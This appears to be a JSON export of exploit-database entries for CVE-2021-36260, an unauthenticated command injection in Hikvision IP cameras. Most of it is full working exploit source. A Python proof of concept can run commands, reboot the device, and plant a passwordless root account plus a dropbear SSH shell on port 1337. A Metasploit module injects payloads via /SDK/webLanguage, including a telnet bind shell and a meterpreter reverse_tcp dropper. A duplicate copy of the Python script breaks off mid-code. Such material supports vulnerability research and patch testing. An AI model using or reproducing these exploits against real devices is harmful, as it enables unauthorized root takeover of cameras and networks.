"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-27T15:51:12", "type": "githubexploit", "title": "Exploit for Command Injection in Hikvision Ds-2Cd2026G2-Iu\\/Sl Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2022-07-06T13:31:58", "id": "EC9F685E-B0E6-5337-BBE2-2A7926315702", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "zdt": [{"lastseen": "2021-12-03T01:50:46", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "zdt", "title": "Hikvision Web Server Build 210702 - Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2021-10-25T00:00:00", "id": "1337DAY-ID-36933", "href": "https://0day.today/exploit/description/36933", "sourceData": "# Exploit Title: Hikvision Web Server Build 210702 - Command Injection\n# Exploit Author: bashis\n# Vendor Homepage: https://www.hikvision.com/\n# Version: 1.0\n# CVE: CVE-2021-36260\n# Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html\n\n# All credit to Watchful_IP\n\n#!/usr/bin/env python3\n\n\"\"\"\nNote:\n1) This code will _not_ verify if remote is Hikvision device or not.\n2) Most of my interest in this code has been concentrated on how to\n reliably detect vulnerable and/or exploitable devices.\n Some devices are easy to detect, verify and exploit the vulnerability,\n other devices may be vulnerable but not so easy to verify and exploit.\n I think the combined verification code should have very high accuracy.\n3) 'safe check' (--check) will try write and read for verification\n 'unsafe check' (--reboot) will try reboot the device for verification\n\n[Examples]\nSafe vulnerability/verify check:\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check\n\nSafe and unsafe vulnerability/verify check:\n(will only use 'unsafe check' if not verified with 'safe check')\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot\n\nUnsafe vulnerability/verify check:\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot\n\nLaunch and connect to SSH shell:\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell\n\nExecute command:\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd \"ls -l\"\n\nExecute blind command:\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind \"reboot\"\n\n$./CVE-2021-36260.py -h\n[*] Hikvision CVE-2021-36260\n[*] PoC by bashis <mcw noemail eu> (2021)\nusage: CVE-2021-36260.py [-h] --rhost RHOST [--rport RPORT] [--check]\n [--reboot] [--shell] [--cmd CMD]\n [--cmd_blind CMD_BLIND] [--noverify]\n [--proto {http,https}]\n\noptional arguments:\n -h, --help show this help message and exit\n --rhost RHOST Remote Target Address (IP/FQDN)\n --rport RPORT Remote Target Port\n --check Check if vulnerable\n --reboot Reboot if vulnerable\n --shell Launch SSH shell\n --cmd CMD execute cmd (i.e: \"ls -l\")\n --cmd_blind CMD_BLIND\n execute blind cmd (i.e: \"reboot\")\n --noverify Do not verify if vulnerable\n --proto {http,https} Protocol used\n$\n\"\"\"\n\nimport os\nimport argparse\nimport time\n\nimport requests\nfrom requests import packages\nfrom requests.packages import urllib3\nfrom requests.packages.urllib3 import exceptions\n\n\nclass Http(object):\n def __init__(self, rhost, rport, proto, timeout=60):\n super(Http, self).__init__()\n\n self.rhost = rhost\n self.rport = rport\n self.proto = proto\n self.timeout = timeout\n\n self.remote = None\n self.uri = None\n\n \"\"\" Most devices will use self-signed certificates, suppress any warnings \"\"\"\n requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)\n\n self.remote = requests.Session()\n\n self._init_uri()\n\n self.remote.headers.update({\n 'Host': f'{self.rhost}:{self.rport}',\n 'Accept': '*/*',\n 'X-Requested-With': 'XMLHttpRequest',\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8',\n })\n \"\"\"\n self.remote.proxies.update({\n # 'http': 'http://127.0.0.1:8080',\n })\n \"\"\"\n\n def send(self, url=None, query_args=None, timeout=5):\n\n if query_args:\n \"\"\"Some devices can handle more, others less, 22 bytes seems like a good compromise\"\"\"\n if len(query_args) > 22:\n print(f'[!] Error: Command \"{query_args}\" to long ({len(query_args)})')\n return None\n\n \"\"\"This weird code will try automatically switch between http/https\n and update Host\n \"\"\"\n try:\n if url and not query_args:\n return self.get(url, timeout)\n else:\n data = self.put('/SDK/webLanguage', query_args, timeout)\n except requests.exceptions.ConnectionError:\n self.proto = 'https' if self.proto == 'http' else 'https'\n self._init_uri()\n try:\n if url and not query_args:\n return self.get(url, timeout)\n else:\n data = self.put('/SDK/webLanguage', query_args, timeout)\n except requests.exceptions.ConnectionError:\n return None\n except requests.exceptions.RequestException:\n return None\n except KeyboardInterrupt:\n return None\n\n \"\"\"302 when requesting http on https enabled device\"\"\"\n\n if data.status_code == 302:\n redirect = data.headers.get('Location')\n self.uri = redirect[:redirect.rfind('/')]\n self._update_host()\n if url and not query_args:\n return self.get(url, timeout)\n else:\n data = self.put('/SDK/webLanguage', query_args, timeout)\n\n return data\n\n def _update_host(self):\n if not self.remote.headers.get('Host') == self.uri[self.uri.rfind('://') + 3:]:\n self.remote.headers.update({\n 'Host': self.uri[self.uri.rfind('://') + 3:],\n })\n\n def _init_uri(self):\n self.uri = '{proto}://{rhost}:{rport}'.format(proto=self.proto, rhost=self.rhost, rport=str(self.rport))\n\n def put(self, url, query_args, timeout):\n \"\"\"Command injection in the <language> tag\"\"\"\n query_args = '<?xml version=\"1.0\" encoding=\"UTF-8\"?>' \\\n f'<language>$({query_args})</language>'\n return self.remote.put(self.uri + url, data=query_args, verify=False, allow_redirects=False, timeout=timeout)\n\n def get(self, url, timeout):\n return self.remote.get(self.uri + url, verify=False, allow_redirects=False, timeout=timeout)\n\n\ndef check(remote, args):\n \"\"\"\n status_code == 200 (OK);\n Verified vulnerable and exploitable\n status_code == 500 (Internal Server Error);\n Device may be vulnerable, but most likely not\n The SDK webLanguage tag is there, but generate status_code 500 when language not found\n I.e. Exist: <language>en</language> (200), not exist: <language>EN</language> (500)\n (Issue: Could also be other directory than 'webLib', r/o FS etc...)\n status_code == 401 (Unauthorized);\n Defiantly not vulnerable\n \"\"\"\n if args.noverify:\n print(f'[*] Not verifying remote \"{args.rhost}:{args.rport}\"')\n return True\n\n print(f'[*] Checking remote \"{args.rhost}:{args.rport}\"')\n\n data = remote.send(url='/', query_args=None)\n if data is None:\n print(f'[-] Cannot establish connection to \"{args.rhost}:{args.rport}\"')\n return None\n print('[i] ETag:', data.headers.get('ETag'))\n\n data = remote.send(query_args='>webLib/c')\n if data is None or data.status_code == 404:\n print(f'[-] \"{args.rhost}:{args.rport}\" do not looks like Hikvision')\n return False\n status_code = data.status_code\n\n data = remote.send(url='/c', query_args=None)\n if not data.status_code == 200:\n \"\"\"We could not verify command injection\"\"\"\n if status_code == 500:\n print(f'[-] Could not verify if vulnerable (Code: {status_code})')\n if args.reboot:\n return check_reboot(remote, args)\n else:\n print(f'[+] Remote is not vulnerable (Code: {status_code})')\n return False\n\n print('[!] Remote is verified exploitable')\n return True\n\n\ndef check_reboot(remote, args):\n \"\"\"\n We sending 'reboot', wait 2 sec, then checking with GET request.\n - if there is data returned, we can assume remote is not vulnerable.\n - If there is no connection or data returned, we can assume remote is vulnerable.\n \"\"\"\n if args.check:\n print('[i] Checking if vulnerable with \"reboot\"')\n else:\n print(f'[*] Checking remote \"{args.rhost}:{args.rport}\" with \"reboot\"')\n remote.send(query_args='reboot')\n time.sleep(2)\n if not remote.send(url='/', query_args=None):\n print('[!] Remote is vulnerable')\n return True\n else:\n print('[+] Remote is not vulnerable')\n return False\n\n\ndef cmd(remote, args):\n if not check(remote, args):\n return False\n data = remote.send(query_args=f'{args.cmd}>webLib/x')\n if data is None:\n return False\n\n data = remote.send(url='/x', query_args=None)\n if data is None or not data.status_code == 200:\n print(f'[!] Error execute cmd \"{args.cmd}\"')\n return False\n print(data.text)\n return True\n\n\ndef cmd_blind(remote, args):\n \"\"\"\n Blind command injection\n \"\"\"\n if not check(remote, args):\n return False\n data = remote.send(query_args=f'{args.cmd_blind}')\n if data is None or not data.status_code == 500:\n print(f'[-] Error execute cmd \"{args.cmd_blind}\"')\n return False\n print(f'[i] Try execute blind cmd \"{args.cmd_blind}\"')\n return True\n\n\ndef shell(remote, args):\n if not check(remote, args):\n return False\n data = remote.send(url='/N', query_args=None)\n\n if data.status_code == 404:\n print(f'[i] Remote \"{args.rhost}\" not pwned, pwning now!')\n data = remote.send(query_args='echo -n P::0:0:W>N')\n if data.status_code == 401:\n print(data.headers)\n print(data.text)\n return False\n remote.send(query_args='echo :/:/bin/sh>>N')\n remote.send(query_args='cat N>>/etc/passwd')\n remote.send(query_args='dropbear -R -B -p 1337')\n remote.send(query_args='cat N>webLib/N')\n else:\n print(f'[i] Remote \"{args.rhost}\" already pwned')\n\n print(f'[*] Trying SSH to {args.rhost} on port 1337')\n os.system(f'stty echo; stty iexten; stty icanon; \\\n ssh -o StrictHostKeyChecking=no -o LogLevel=error -o UserKnownHostsFile=/dev/null \\\n [email\u00a0protected]{args.rhost} -p 1337')\n\n\ndef main():\n print('[*] Hikvision CVE-2021-36260\\n[*] PoC by bashis <mcw noemail eu> (2021)')\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--rhost', required=True, type=str, default=None, help='Remote Target Address (IP/FQDN)')\n parser.add_argument('--rport', required=False, type=int, default=80, help='Remote Target Port')\n parser.add_argument('--check', required=False, default=False, action='store_true', help='Check if vulnerable')\n parser.add_argument('--reboot', required=False, default=False, action='store_true', help='Reboot if vulnerable')\n parser.add_argument('--shell', required=False, default=False, action='store_true', help='Launch SSH shell')\n parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: \"ls -l\")')\n parser.add_argument('--cmd_blind', required=False, type=str, default=None, help='execute blind cmd (i.e: \"reboot\")')\n parser.add_argument(\n '--noverify', required=False, default=False, action='store_true', help='Do not verify if vulnerable'\n )\n parser.add_argument(\n '--proto', required=False, type=str, choices=['http', 'https'], default='http', help='Protocol used'\n )\n args = parser.parse_args()\n\n remote = Http(args.rhost, args.rport, args.proto)\n\n try:\n if args.shell:\n shell(remote, args)\n elif args.cmd:\n cmd(remote, args)\n elif args.cmd_blind:\n cmd_blind(remote, args)\n elif args.check:\n check(remote, args)\n elif args.reboot:\n check_reboot(remote, args)\n else:\n parser.parse_args(['-h'])\n except KeyboardInterrupt:\n return False\n\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/36933", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-11T23:32:08", "description": "This Metasploit module exploits an unauthenticated command injection in a variety of Hikvision IP cameras (CVE-2021-36260). The module inserts a command into an XML payload used with an HTTP PUT request sent to the /SDK/webLanguage endpoint, resulting in command execution as the root user. This module specifically attempts to exploit the blind variant of the attack. The module was successfully tested against an HWI-B120-D/W using firmware V5.5.101 build 200408. It was also tested against an unaffected DS-2CD2142FWD-I using firmware V5.5.0 build 170725. Please see the Hikvision advisory for a full list of affected products.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-28T00:00:00", "type": "zdt", "title": "Hikvision IP Camera Unauthenticated Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2022-02-28T00:00:00", "id": "1337DAY-ID-37431", "href": "https://0day.today/exploit/description/37431", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Hikvision IP Camera Unauthenticated Command Injection',\n 'Description' => %q{\n This module exploits an unauthenticated command injection in a variety of Hikvision IP\n cameras (CVE-2021-36260). The module inserts a command into an XML payload used with an\n HTTP PUT request sent to the `/SDK/webLanguage` endpoint, resulting in command execution\n as the `root` user.\n\n This module specifically attempts to exploit the blind variant of the attack. The module\n was successfully tested against an HWI-B120-D/W using firmware V5.5.101 build 200408. It\n was also tested against an unaffected DS-2CD2142FWD-I using firmware V5.5.0 build 170725.\n Please see the Hikvision advisory for a full list of affected products.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Watchful_IP', # Vulnerability discovery and disclosure\n 'bashis', # Proof of concept\n 'jbaines-r7' # Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2021-36260' ],\n [ 'URL', 'https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html'],\n [ 'URL', 'https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/security-notification-command-injection-vulnerability-in-some-hikvision-products/'],\n [ 'URL', 'https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py']\n ],\n 'DisclosureDate' => '2021-09-18',\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_ARMLE],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n # the target has very limited payload targets and a tight payload space.\n # bind_busybox_telnetd might be *the only* one.\n 'PAYLOAD' => 'cmd/unix/bind_busybox_telnetd',\n # saving four bytes of payload space by using 'sh' instead of '/bin/sh'\n 'LOGIN_CMD' => 'sh',\n 'Space' => 23\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_ARMLE],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'printf', 'echo' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 80,\n 'SSL' => false,\n 'MeterpreterTryToFork' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n # Check will test two things:\n # 1. Is the endpoint a Hikvision camera?\n # 2. Does the endpoint respond as expected to exploitation? This module is\n # specifically testing for the blind variant of this attack so we key off\n # of the returned HTTP status code. The developer's test target responded\n # to exploitation with a 500. Notes from bashis' exploit indicates that\n # they saw targets respond with 200 as well, so we'll accept that also.\n def check\n # Hikvision landing page redirects to '/doc/page/login.asp' via JavaScript:\n # <script>\n # window.location.href = \"/doc/page/login.asp?_\" + (new Date()).getTime();\n # </script>\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/')\n })\n return CheckCode::Unknown(\"Didn't receive a response from the target.\") unless res\n return CheckCode::Safe('The target did not respond with a 200 OK') unless res.code == 200\n return CheckCode::Safe('The target doesn\\'t appear to be a Hikvision device') unless res.body.include?('/doc/page/login.asp?_')\n\n payload = '<xml><language>$(cat /proc/cpuinfo)</language></xml>'\n res = send_request_cgi({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),\n 'data' => payload\n })\n\n return CheckCode::Unknown(\"Didn't receive a response from the target.\") unless res\n return CheckCode::Safe('The target did not respond with a 200 OK or 500 error') unless (res.code == 200 || res.code == 500)\n\n # Some cameras are not vulnerable and still respond 500. We can weed them out by making\n # the remote target sleep and use a low timeout. This might not be good for high latency targets\n # or for people using Metasploit as a vulnerability scanner... but it's better than flagging all\n # 500 responses as vulnerable.\n payload = '<xml><language>$(sleep 20)</language></xml>'\n res = send_request_cgi({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),\n 'data' => payload\n }, 10)\n\n return CheckCode::Appears('It appears the target executed the provided sleep command.') unless res\n\n CheckCode::Safe('The target did not execute the provided sleep command.')\n end\n\n def execute_command(cmd, _opts = {})\n # The injection space is very small. The entire snprintf is 0x1f bytes and the\n # format string is:\n #\n # /dav/%s.tar.gz\n #\n # Which accounts for 12 bytes, leaving only 19 bytes for our payload. Fortunately,\n # snprintf will let us reclaim '.tar.gz' so in reality, there are 26 bytes for\n # our payload. We need 3 bytes to invoke our injection: $(). Leaving 23 bytes\n # for payload. The 'echo' stager has a minium of 26 bytes but we obviously don't\n # have that much space. We can steal the extra space from the \"random\" file name\n # and compress ' >> ' to '>>'. That will get us below 23. Squeezing the extra\n # bytes will also allow printf stager to do more than 1 byte per exploitation.\n cmd = cmd.gsub(%r{tmp/[0-9a-zA-Z]+}, @fname)\n cmd = cmd.gsub(/ >/, '>')\n cmd = cmd.gsub(/> /, '>')\n\n payload = \"<xml><language>$(#{cmd})</language></xml>\"\n res = send_request_cgi({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),\n 'data' => payload\n })\n\n fail_with(Failure::Disconnected, 'Connection failed') unless res\n fail_with(Failure::UnexpectedReply, \"HTTP status code is not 200 or 500: #{res.code}\") unless (res.code == 200 || res.code == 500)\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n # generate a random value for the tmp file name. See execute_command for details\n @fname = \"tmp/#{Rex::Text.rand_text_alpha(1)}\"\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n # 26 is technically a lie. See `execute_command` for additional insight\n execute_cmdstager(linemax: 26)\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37431", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-10-25T17:32:30", "description": "", "cvss3": {}, "published": "2021-10-25T00:00:00", "type": "packetstorm", "title": "Hikvision Web Server Build 210702 Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-36260"], "modified": "2021-10-25T00:00:00", "id": "PACKETSTORM:164603", "href": "https://packetstormsecurity.com/files/164603/Hikvision-Web-Server-Build-210702-Command-Injection.html", "sourceData": "`# Exploit Title: Hikvision Web Server Build 210702 - Command Injection \n# Exploit Author: bashis \n# Vendor Homepage: https://www.hikvision.com/ \n# Version: 1.0 \n# CVE: CVE-2021-36260 \n# Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html \n \n# All credit to Watchful_IP \n \n#!/usr/bin/env python3 \n \n\"\"\" \nNote: \n1) This code will _not_ verify if remote is Hikvision device or not. \n2) Most of my interest in this code has been concentrated on how to \nreliably detect vulnerable and/or exploitable devices. \nSome devices are easy to detect, verify and exploit the vulnerability, \nother devices may be vulnerable but not so easy to verify and exploit. \nI think the combined verification code should have very high accuracy. \n3) 'safe check' (--check) will try write and read for verification \n'unsafe check' (--reboot) will try reboot the device for verification \n \n[Examples] \nSafe vulnerability/verify check: \n$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check \n \nSafe and unsafe vulnerability/verify check: \n(will only use 'unsafe check' if not verified with 'safe check') \n$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot \n \nUnsafe vulnerability/verify check: \n$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot \n \nLaunch and connect to SSH shell: \n$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell \n \nExecute command: \n$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd \"ls -l\" \n \nExecute blind command: \n$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind \"reboot\" \n \n$./CVE-2021-36260.py -h \n[*] Hikvision CVE-2021-36260 \n[*] PoC by bashis <mcw noemail eu> (2021) \nusage: CVE-2021-36260.py [-h] --rhost RHOST [--rport RPORT] [--check] \n[--reboot] [--shell] [--cmd CMD] \n[--cmd_blind CMD_BLIND] [--noverify] \n[--proto {http,https}] \n \noptional arguments: \n-h, --help show this help message and exit \n--rhost RHOST Remote Target Address (IP/FQDN) \n--rport RPORT Remote Target Port \n--check Check if vulnerable \n--reboot Reboot if vulnerable \n--shell Launch SSH shell \n--cmd CMD execute cmd (i.e: \"ls -l\") \n--cmd_blind CMD_BLIND \nexecute blind cmd (i.e: \"reboot\") \n--noverify Do not verify if vulnerable \n--proto {http,https} Protocol used \n$ \n\"\"\" \n \nimport os \nimport argparse \nimport time \n \nimport requests \nfrom requests import packages \nfrom requests.packages import urllib3 \nfrom requests.packages.urllib3 import exceptions \n \n \nclass Http(object): \ndef __init__(self, rhost, rport, proto, timeout=60): \nsuper(Http, self).__init__() \n \nself.rhost = rhost \nself.rport = rport \nself.proto = proto \nself.timeout = timeout \n \nself.remote = None \nself.uri = None \n \n\"\"\" Most devices will use self-signed certificates, suppress any warnings \"\"\" \nrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) \n \nself.remote = requests.Session() \n \nself._init_uri() \n \nself.remote.headers.update({ \n'Host': f'{self.rhost}:{self.rport}', \n'Accept': '*/*', \n'X-Requested-With': 'XMLHttpRequest', \n'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', \n'Accept-Encoding': 'gzip, deflate', \n'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8', \n}) \n\"\"\" \nself.remote.proxies.update({ \n# 'http': 'http://127.0.0.1:8080', \n}) \n\"\"\" \n \ndef send(self, url=None, query_args=None, timeout=5): \n \nif query_args: \n\"\"\"Some devices can handle more, others less, 22 bytes seems like a good compromise\"\"\" \nif len(query_args) > 22: \nprint(f'[!] Error: Command \"{query_args}\" to long ({len(query_args)})') \nreturn None \n \n\"\"\"This weird code will try automatically switch between http/https \nand update Host \n\"\"\" \ntry: \nif url and not query_args: \nreturn self.get(url, timeout) \nelse: \ndata = self.put('/SDK/webLanguage', query_args, timeout) \nexcept requests.exceptions.ConnectionError: \nself.proto = 'https' if self.proto == 'http' else 'https' \nself._init_uri() \ntry: \nif url and not query_args: \nreturn self.get(url, timeout) \nelse: \ndata = self.put('/SDK/webLanguage', query_args, timeout) \nexcept requests.exceptions.ConnectionError: \nreturn None \nexcept requests.exceptions.RequestException: \nreturn None \nexcept KeyboardInterrupt: \nreturn None \n \n\"\"\"302 when requesting http on https enabled device\"\"\" \n \nif data.status_code == 302: \nredirect = data.headers.get('Location') \nself.uri = redirect[:redirect.rfind('/')] \nself._update_host() \nif url and not query_args: \nreturn self.get(url, timeout) \nelse: \ndata = self.put('/SDK/webLanguage', query_args, timeout) \n \nreturn data \n \ndef _update_host(self): \nif not self.remote.headers.get('Host') == self.uri[self.uri.rfind('://') + 3:]: \nself.remote.headers.update({ \n'Host': self.uri[self.uri.rfind('://') + 3:], \n}) \n \ndef _init_uri(self): \nself.uri = '{proto}://{rhost}:{rport}'.format(proto=self.proto, rhost=self.rhost, rport=str(self.rport)) \n \ndef put(self, url, query_args, timeout): \n\"\"\"Command injection in the <language> tag\"\"\" \nquery_args = '<?xml version=\"1.0\" encoding=\"UTF-8\"?>' \\ \nf'<language>$({query_args})</language>' \nreturn self.remote.put(self.uri + url, data=query_args, verify=False, allow_redirects=False, timeout=timeout) \n \ndef get(self, url, timeout): \nreturn self.remote.get(self.uri + url, verify=False, allow_redirects=False, timeout=timeout) \n \n \ndef check(remote, args): \n\"\"\" \nstatus_code == 200 (OK); \nVerified vulnerable and exploitable \nstatus_code == 500 (Internal Server Error); \nDevice may be vulnerable, but most likely not \nThe SDK webLanguage tag is there, but generate status_code 500 when language not found \nI.e. Exist: <language>en</language> (200), not exist: <language>EN</language> (500) \n(Issue: Could also be other directory than 'webLib', r/o FS etc...) \nstatus_code == 401 (Unauthorized); \nDefiantly not vulnerable \n\"\"\" \nif args.noverify: \nprint(f'[*] Not verifying remote \"{args.rhost}:{args.rport}\"') \nreturn True \n \nprint(f'[*] Checking remote \"{args.rhost}:{args.rport}\"') \n \ndata = remote.send(url='/', query_args=None) \nif data is None: \nprint(f'[-] Cannot establish connection to \"{args.rhost}:{args.rport}\"') \nreturn None \nprint('[i] ETag:', data.headers.get('ETag')) \n \ndata = remote.send(query_args='>webLib/c') \nif data is None or data.status_code == 404: \nprint(f'[-] \"{args.rhost}:{args.rport}\" do not looks like Hikvision') \nreturn False \nstatus_code = data.status_code \n \ndata = remote.send(url='/c', query_args=None) \nif not data.status_code == 200: \n\"\"\"We could not verify command injection\"\"\" \nif status_code == 500: \nprint(f'[-] Could not verify if vulnerable (Code: {status_code})') \nif args.reboot: \nreturn check_reboot(remote, args) \nelse: \nprint(f'[+] Remote is not vulnerable (Code: {status_code})') \nreturn False \n \nprint('[!] Remote is verified exploitable') \nreturn True \n \n \ndef check_reboot(remote, args): \n\"\"\" \nWe sending 'reboot', wait 2 sec, then checking with GET request. \n- if there is data returned, we can assume remote is not vulnerable. \n- If there is no connection or data returned, we can assume remote is vulnerable. \n\"\"\" \nif args.check: \nprint('[i] Checking if vulnerable with \"reboot\"') \nelse: \nprint(f'[*] Checking remote \"{args.rhost}:{args.rport}\" with \"reboot\"') \nremote.send(query_args='reboot') \ntime.sleep(2) \nif not remote.send(url='/', query_args=None): \nprint('[!] Remote is vulnerable') \nreturn True \nelse: \nprint('[+] Remote is not vulnerable') \nreturn False \n \n \ndef cmd(remote, args): \nif not check(remote, args): \nreturn False \ndata = remote.send(query_args=f'{args.cmd}>webLib/x') \nif data is None: \nreturn False \n \ndata = remote.send(url='/x', query_args=None) \nif data is None or not data.status_code == 200: \nprint(f'[!] Error execute cmd \"{args.cmd}\"') \nreturn False \nprint(data.text) \nreturn True \n \n \ndef cmd_blind(remote, args): \n\"\"\" \nBlind command injection \n\"\"\" \nif not check(remote, args): \nreturn False \ndata = remote.send(query_args=f'{args.cmd_blind}') \nif data is None or not data.status_code == 500: \nprint(f'[-] Error execute cmd \"{args.cmd_blind}\"') \nreturn False \nprint(f'[i] Try execute blind cmd \"{args.cmd_blind}\"') \nreturn True \n \n \ndef shell(remote, args): \nif not check(remote, args): \nreturn False \ndata = remote.send(url='/N', query_args=None) \n \nif data.status_code == 404: \nprint(f'[i] Remote \"{args.rhost}\" not pwned, pwning now!') \ndata = remote.send(query_args='echo -n P::0:0:W>N') \nif data.status_code == 401: \nprint(data.headers) \nprint(data.text) \nreturn False \nremote.send(query_args='echo :/:/bin/sh>>N') \nremote.send(query_args='cat N>>/etc/passwd') \nremote.send(query_args='dropbear -R -B -p 1337') \nremote.send(query_args='cat 